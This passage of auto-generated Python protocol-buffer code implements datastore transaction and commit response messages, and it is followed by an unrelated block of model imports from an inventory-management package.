    if (self.has_header_):
      out.putVarInt32(26)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Same layout as OutputUnchecked but skips the unset required field.
    if (self.has_app_):
      out.putVarInt32(10)
      out.putPrefixedString(self.app_)
    if (self.has_allow_multiple_eg_):
      out.putVarInt32(16)
      out.putBoolean(self.allow_multiple_eg_)
    if (self.has_header_):
      out.putVarInt32(26)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    # Decode loop: unknown tags are skipped, tag 0 means corrupt input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_app(d.getPrefixedString())
        continue
      if tt == 16:
        self.set_allow_multiple_eg(d.getBoolean())
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Debug text rendering; prefix is the indentation for nested messages."""
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_app_: res+=prefix+("app: %s\n" % self.DebugFormatString(self.app_))
    if self.has_allow_multiple_eg_: res+=prefix+("allow_multiple_eg: %s\n" % self.DebugFormatBool(self.allow_multiple_eg_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a tag -> value dict into a tuple indexed 0..maxtag.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Wire tag numbers for the fields above.
  kheader = 3
  kapp = 1
  kallow_multiple_eg = 2

  # Tag -> field-name lookup table (index 0 is the "ErrorCode" slot).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "app",
    2: "allow_multiple_eg",
    3: "header",
  }, 3)

  # Tag -> encoder wire-type lookup table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.STRING,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  # Boilerplate emitted by the protocol-buffer compiler.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.BeginTransactionRequest'
class CommitResponse_Version(ProtocolBuffer.ProtocolMessage):
  """Generated message: one element of CommitResponse's repeated "Version"
  group (group field 3). Carries root_entity_key (required message,
  field 4) and version (required int64, field 5); both are required per
  IsInitialized below.

  NOTE(review): auto-generated protocol-buffer code — do not hand-edit the
  logic; regenerate from the .proto instead.
  """

  # Presence flags; class-level 0 means "unset" until a setter flips it.
  has_root_entity_key_ = 0
  has_version_ = 0
  version_ = 0

  def __init__(self, contents=None):
    # root_entity_key_ is a required sub-message, so it is instantiated
    # eagerly (presumably Reference is the datastore entity-key message —
    # defined elsewhere in this module).
    self.root_entity_key_ = Reference()
    if contents is not None: self.MergeFromString(contents)

  # --- root_entity_key accessors ---
  def root_entity_key(self): return self.root_entity_key_

  # Marks the field present and returns the mutable sub-message.
  def mutable_root_entity_key(self): self.has_root_entity_key_ = 1; return self.root_entity_key_

  def clear_root_entity_key(self):self.has_root_entity_key_ = 0; self.root_entity_key_.Clear()

  def has_root_entity_key(self): return self.has_root_entity_key_

  # --- version accessors ---
  def version(self): return self.version_

  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x

  def clear_version(self):
    # Only reset when set, so a cleared instance keeps sharing the
    # class-level defaults.
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = 0

  def has_version(self): return self.has_version_


  def MergeFrom(self, x):
    """Field-wise merge of another CommitResponse_Version into self."""
    assert x is not self
    if (x.has_root_entity_key()): self.mutable_root_entity_key().MergeFrom(x.root_entity_key())
    if (x.has_version()): self.set_version(x.version())

  def Equals(self, x):
    """Return 1 if x has the same presence bits and field values."""
    if x is self: return 1
    if self.has_root_entity_key_ != x.has_root_entity_key_: return 0
    if self.has_root_entity_key_ and self.root_entity_key_ != x.root_entity_key_: return 0
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Check that both required fields are set (recursing into the key)."""
    initialized = 1
    if (not self.has_root_entity_key_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: root_entity_key not set.')
    elif not self.root_entity_key_.IsInitialized(debug_strs): initialized = 0
    if (not self.has_version_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: version not set.')
    return initialized

  def ByteSize(self):
    """Serialized size assuming all required fields are set."""
    n = 0
    n += self.lengthString(self.root_entity_key_.ByteSize())
    n += self.lengthVarInt64(self.version_)
    # +2 for the two one-byte field tags (34 and 40) written below.
    return n + 2

  def ByteSizePartial(self):
    """Serialized size counting only the fields actually set."""
    n = 0
    if (self.has_root_entity_key_):
      n += 1
      n += self.lengthString(self.root_entity_key_.ByteSizePartial())
    if (self.has_version_):
      n += 1
      n += self.lengthVarInt64(self.version_)
    return n

  def Clear(self):
    self.clear_root_entity_key()
    self.clear_version()

  def OutputUnchecked(self, out):
    """Serialize without presence checks; caller must ensure IsInitialized."""
    # Field 4: tag 34 = (4 << 3) | wiretype 2, length-prefixed message.
    out.putVarInt32(34)
    out.putVarInt32(self.root_entity_key_.ByteSize())
    self.root_entity_key_.OutputUnchecked(out)
    # Field 5: tag 40 = (5 << 3) | wiretype 0, varint int64.
    out.putVarInt32(40)
    out.putVarInt64(self.version_)

  def OutputPartial(self, out):
    """Serialize only the fields that are present."""
    if (self.has_root_entity_key_):
      out.putVarInt32(34)
      out.putVarInt32(self.root_entity_key_.ByteSizePartial())
      self.root_entity_key_.OutputPartial(out)
    if (self.has_version_):
      out.putVarInt32(40)
      out.putVarInt64(self.version_)

  def TryMerge(self, d):
    """Merge fields from decoder d until the enclosing group's END tag."""
    while 1:
      tt = d.getVarInt32()
      # 28 = (3 << 3) | wiretype 4: END_GROUP for parent field 3 — the
      # parent CommitResponse writes tags 27/28 around each element.
      if tt == 28: break
      if tt == 34:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_root_entity_key().TryMerge(tmp)
        continue
      if tt == 40:
        self.set_version(d.getVarInt64())
        continue


      # Tag 0 is invalid; any other unknown tag is skipped.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Debug text dump of the set fields."""
    res=""
    if self.has_root_entity_key_:
      res+=prefix+"root_entity_key <\n"
      res+=self.root_entity_key_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatInt64(self.version_))
    return res

class CommitResponse(ProtocolBuffer.ProtocolMessage):
  """Generated message: datastore Commit RPC response. Fields: optional
  cost (message, field 1) and repeated Version group (field 3, elements
  of CommitResponse_Version).

  NOTE(review): auto-generated protocol-buffer code — do not hand-edit the
  logic; regenerate from the .proto instead.
  """

  # Optional cost sub-message is lazily created (see cost()); None until
  # first access.
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    self.version_ = []
    # Lock guarding the lazy creation of cost_ below.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def cost(self):
    """Return the cost sub-message, creating it lazily (double-checked
    locking) without marking it present."""
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  # Marks the field present and returns the (lazily created) sub-message.
  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):
    # Clear the existing instance in place rather than dropping it, so a
    # previously handed-out reference stays valid.
    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_

  # --- repeated version accessors ---
  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_

  def version(self, i):
    return self.version_[i]

  def mutable_version(self, i):
    return self.version_[i]

  def add_version(self):
    """Append and return a new empty CommitResponse_Version element."""
    x = CommitResponse_Version()
    self.version_.append(x)
    return x

  def clear_version(self):
    self.version_ = []

  def MergeFrom(self, x):
    """Field-wise merge: cost is merged, version elements are appended."""
    assert x is not self
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())
    for i in xrange(x.version_size()): self.add_version().CopyFrom(x.version(i))

  def Equals(self, x):
    """Return 1 if x has the same presence bits, cost, and version list."""
    if x is self: return 1
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Check that every present sub-message is itself initialized."""
    initialized = 1
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    for p in self.version_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    # 2 bytes per version element for its START_GROUP/END_GROUP tags (27/28).
    n += 2 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.version_[i].ByteSize()
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    n += 2 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.version_[i].ByteSizePartial()
    return n

  def Clear(self):
    self.clear_cost()
    self.clear_version()

  def OutputUnchecked(self, out):
    """Serialize without presence checks on required sub-fields."""
    # Field 1 (cost): tag 10 = (1 << 3) | wiretype 2, length-prefixed.
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)
    # Field 3 (Version group): each element bracketed by START_GROUP (27)
    # and END_GROUP (28) tags.
    for i in xrange(len(self.version_)):
      out.putVarInt32(27)
      self.version_[i].OutputUnchecked(out)
      out.putVarInt32(28)

  def OutputPartial(self, out):
    """Serialize only the fields that are present."""
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(27)
      self.version_[i].OutputPartial(out)
      out.putVarInt32(28)

  def TryMerge(self, d):
    """Merge tag/value pairs from decoder d until its buffer is exhausted."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue
      # 27 = START_GROUP for field 3; the element's TryMerge consumes up
      # to (and including) the matching END_GROUP tag 28.
      if tt == 27:
        self.add_version().TryMerge(d)
        continue


      # Tag 0 is invalid; any other unknown tag is skipped.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Debug text dump; Version elements are numbered when requested."""
    res=""
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("Version%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    return res


  # Densify a sparse {tag: value} mapping into a tuple indexed 0..maxtag.
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field-number constants; group members use the parent-prefixed names.
  kcost = 1
  kVersionGroup = 3
  kVersionroot_entity_key = 4
  kVersionversion = 5

  # Tag -> field-name lookup for debug output; index 0 reserved for
  # "ErrorCode".
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cost",
    3: "Version",
    4: "root_entity_key",
    5: "version",
  }, 5)

  # Tag -> wire-type lookup; unknown tags fall back to MAX_TYPE.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STARTGROUP,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.NUMERIC,
  }, 5, ProtocolBuffer.Encoder.MAX_TYPE)

  # Style metadata emitted by the protocol compiler; empty for this message.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.CommitResponse'
# Hook for a runtime-specific extension module; nothing extra to do when
# it is not in play.
if _extension_runtime:
  pass

# Explicit public API of this generated module.
__all__ = ['InternalHeader','Transaction','Query','Query_Filter','Query_Order','CompiledQuery','CompiledQuery_PrimaryScan','CompiledQuery_MergeJoinScan','CompiledQuery_EntityFilter','CompiledCursor','CompiledCursor_PositionIndexValue','CompiledCursor_Position','Cursor','Error','Cost','Cost_CommitCost','GetRequest','GetResponse','GetResponse_Entity','PutRequest','PutResponse','TouchRequest','TouchResponse','DeleteRequest','DeleteResponse','NextRequest','QueryResult','AllocateIdsRequest','AllocateIdsResponse','CompositeIndices','AddActionsRequest','AddActionsResponse','BeginTransactionRequest','CommitResponse','CommitResponse_Version']

from .image import Image
from .product_category import ProductCategory
from .supplier import Supplier, PaymentMethod
from .product import Product
from .product import ProductImage
from .enum_values import EnumValues
from .related_values import RelatedValues
from .customer import Customer
from .expense import Expense
from .incoming import Incoming
from .shipping import Shipping, ShippingLine
from .receiving import Receiving, ReceivingLine
from .inventory_transaction import InventoryTransaction, InventoryTransactionLine
from .purchase_order import PurchaseOrder, PurchaseOrderLine
from .sales_order import SalesOrder, SalesOrderLine
from .user import User
from .role import Role, roles_users
from .organization import Organization
from .inventory_in_out_link import InventoryInOutLink
from .aspects import update_menemonic
from .product_inventory import ProductInventory
